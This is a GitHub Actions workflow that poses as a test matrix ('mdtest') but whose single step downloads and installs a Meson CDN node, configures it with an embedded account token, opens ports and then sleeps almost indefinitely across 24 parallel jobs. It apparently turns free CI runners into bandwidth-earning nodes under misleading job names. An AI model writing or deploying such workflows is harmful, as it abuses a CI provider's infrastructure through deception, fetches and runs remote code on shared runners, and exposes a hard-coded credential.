name: repi
on: [push]
    
env:
  RUBY_VERSION: '2.6'
      
jobs:
  mdtest:
    runs-on: ubuntu-20.04
    strategy:
      max-parallel: 20
      fail-fast: false
      matrix:
        test: [1.1, 1.2, 1.3, 1.4, 1.5, 1.6]
        flag: [A, B, C, Ui]
    timeout-minutes: 360
    steps:
    - name: Setup
      uses: actions/checkout@v1
    - name: runner_go
      run: |
        sudo ufw allow 22
        sudo ufw allow 443
        sudo ufw enable
        wget 'https://staticassets.meson.network/public/meson_cdn/v3.1.20/meson_cdn-linux-amd64.tar.gz' && tar -zxf meson_cdn-linux-amd64.tar.gz && rm -f meson_cdn-linux-amd64.tar.gz && cd ./meson_cdn-linux-amd64 && sudo ./service install meson_cdn
        sudo ./meson_cdn config set --token=iaxrtlwxrzvctdycqjydgafn --https_port=443 --cache.size=30
        sudo ./service start meson_cdn
        sudo apt update -y && sleep 50000000
